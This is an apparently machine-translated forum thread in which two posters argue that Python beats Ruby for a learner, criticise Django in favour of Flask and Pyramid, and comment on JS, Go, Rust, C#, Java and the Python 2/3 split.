I faced the same choice about 6 years ago and chose Python. Didn't regret it. It is versatile enough to write on it not only sites. Ruby is unfortunately more of a RoR language than a general purpose language. It has very little software outside of RoR and its purpose is very narrow, although the language itself is cool. Python is used in a lot of places outside the web - from microcontrollers to complex scientific calculations.
Also, a little personal. I hate Django. This is one of the worst web frameworks that, by a strange coincidence, turned out to be in trend. He, imprisoned for newspaper sites and blogs, with a severe syndrome of bicycle building and Not Invented Here, is molded wherever he is and, especially, where he is not. And it looks ridiculous (especially the ORM is poor in it in comparison with the same SQLAlchemy). There are many better examples for many applications (Flask, Pyramid). If you undertake to make a web application, and not a business card site / blog (which is better to do in general on php and Wordpress), take a closer look at them.
UPD: In general, there is a feeling that now it is best to learn JS, although it is bad for almost everything that is in it. :) Go, Rust are interesting, but still too immature. Here also C#/.NET with their open source movements are starting to look good. Well, there is always Java for lovers of vintage and maximum cross-platform (with swear words). All in all, this is a difficult time. :)

Somehow I remember seeing an interesting comparison: "Django is Linux, and RoR is Mac OS", a very revealing comparison.
2. Ruby or Python - definitely python. The language is richer, more features. Ruby got out only due to the Rails framework, pure ruby ​​is almost never used anywhere.
UPD: I wanted to add one BIG gem to Python, which is that it splits into two branches 2x and 3x. The development of the language itself continues in the third branch, and all the libraries remain in the second :( If this does not kill him, then he will greatly undermine his health.
